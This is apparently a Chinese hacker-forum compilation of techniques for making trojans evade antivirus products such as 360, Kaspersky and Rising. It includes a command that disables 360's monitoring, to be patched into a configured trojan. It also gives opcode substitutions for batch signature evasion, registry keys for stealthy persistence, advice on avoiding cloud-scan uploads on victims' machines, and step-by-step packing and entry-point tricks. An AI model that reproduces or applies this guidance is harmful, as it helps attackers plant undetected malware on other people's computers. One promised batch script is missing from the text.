一、ASM彙編
這個是最舒服的,用OD打開已經配置好的馬,找0區(也可以用TOPO加空段)要很大一片哦!右擊,選擇“二進制”→“編輯”,在ASCII中輸入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”記下寫入命令的改動的第一個地址,假設爲401180。
再找一個小空段,記下地址,假設爲40116A
寫入:
Push 401180 (也就是那個改動的地址)
Call WinExec
Jmp 原程序入口點(在OD右邊)
二、BAT+VBS+RAR
BAT代碼如下:
然後用WINRAR建立自解壓文件
路徑:c:\windows
解壓後運行:vbs文件名.vbs
安靜模式:全部隱藏
覆蓋方式:覆蓋所有文件
做完即可。
搞定雲查殺的實用小技巧
最近在研究360雲查殺認爲有幾點是必須要注意的,拿出來跟大家分享。
1、做免殺時一定要關閉自己殺軟的上傳可疑文件選項;
2、避免自啓動(包括服務啓動和註冊表啓動);
3、不要在小雞的桌面、windows目錄下、system32目錄下執行木馬,否則360無條件上傳exe文件。不到五分鐘即會被更新到病毒庫,立即查殺。
以上三點注意到了,估計雲查殺就沒問題了。
可通用的批量免殺代碼
免殺代碼替換方法的小結:
MOV-CMP(有時候可以替換)
MOV EAX,7-SUB EAX,7
ADD-ADC(有時候可以替換)
SUB-SBB(有時候可以替換)
TEST-AND
XOR-OR
OR-XOR
LEA-SUB
CMP-SUB
xor eax,eax
xor eax,eax
改成
xor eax,eax
or eax,eax
有時候可以批量替換
在C32裏面搜索33 c0 33 c0
替換成33 c0 09 c0
全部替換有時候都不會出問題.而且免殺效果也還可以.
Test eax,eax
JE XXXXXXXXX
改成
AND EAX,EAX
JE XXXXXXXXX
有時候也可以批量替換
把85 C0 74替換成 21 C0 74
在網上看到的.說pop等價於push
我也試過 貌似每次改都會出錯的..
不過你們想試 也可以試試看的.也許什麼時候能用哦 哈哈哈..
主動防禦怎麼過?
過主動防禦的方法:
1.cmd運行前執行的程序(被動啓動)
HKEY_CURRENT_USERSoftwareMicrosoftCommand Processor
AutoRun REG_SZ "xxx.exe"
2.session manager(自啓動)
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSession Manager
HKEY_LOCAL_MACHINESYSTEMControlSet002ControlSession Manager
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession Manager
BootExecute REG_MULIT_SZ "autocheck autochk * xxx"
瑞星就來了一個bsmain,用來開機查毒
不過xxx.exe必須用Native API,不能用Win32API
3.屏幕保護程序(被動啓動)
HKEY_USERS.DEFAULTControl PanelDesktop
SCRNSAVE.EXE REG_SZ "xxx.scr"
其實屏幕保護程序scr文件就是PE文件
4.
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpolicies
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesRun
"MSCONFIG"="%SystemRoot%xxx.exe"
——還有很多註冊表項更改後,可以實現自啓動,這裏先寫這幾個,其他的去要測試.
另外,還有一個偷換控制面板文件來被動啓動的方式,控制面板文件在C:windowssystem32下
的.cpl文件,這個文件類似與dll文件.方法給大家了,至於怎麼利用,大家就各顯神通吧!
木馬免殺技術歸總
一.入口點加1免殺法:
1.用到工具PEditor
2.特點:非常簡單實用,但有時還會被卡巴查殺
3.操作要點:用PEditor打開無殼木馬程序,把原入口點加1即可
二.變化入口地址免殺法:
1.用到工具:OllyDbg,PEditor
2.特點:操作也比較容易,而且免殺效果比入口點加1點要佳.
3.操作要點:用OD載入無殼的木馬程序,把入口點的前二句移到零區域去執行,然後又跳回到入口點的下面第三句繼續執行.最後用PEditor把入口點改成零區域的地址.
三.加花指令法免殺法:
1.用到工具:OllyDbg,PEditor
2.特點:免殺通用性非常好,加了花指令後,就基本達到大量殺毒軟件的免殺.
3.操作要點:用OD打開無殼的木馬程序,找到零區域,把我們準備好的花指令填進去填好後又跳回到入口點,保存好後,再用PEditor把入口點改成零區域處填入花指令的着地址.
四.加殼或加僞裝殼免殺法:
1.用到工具:一些冷門殼,或加僞裝殼的工具,比如木馬綵衣等.
2.特點:操作簡單化,但免殺的時間不長,可能很快被殺,也很難躲過卡巴的追殺
3.操作要點:爲了達到更好的免殺效果可採用多重加殼,或加了殼後在加僞裝殼的免殺效果更佳
五.打亂殼的頭文件或殼中加花免殺法:
1.用到工具:祕密行動 ,UPX加殼工具.
2.特點:操作也是傻瓜化,免殺效果也正當不錯,特別對卡巴的免殺效果非常好
3.操作要點:首先一定要把沒加過殼的木馬程序用UPX加層殼,然後用祕密行動這款工具中的SCramble功能進行把UPX殼的頭文件打亂,從而達到免殺效果.
六.修改文件特徵碼免殺法:
1.用到工具:特徵碼定位器,OllyDbg
2.特點:操作較複雜,要定位修改一系列過程,而且只針對每種殺毒軟件的免殺,要達到多種殺毒軟件的免殺,必需修改各種殺毒軟件的特徵碼.但免殺效果好
操作要點:對某種殺毒軟件的特徵碼的定位到修改一系列慢長過程.
感謝反饋,我們會進一步覈實
另外您那的限制條件下運行此木馬,估計傳播就不會那麼快了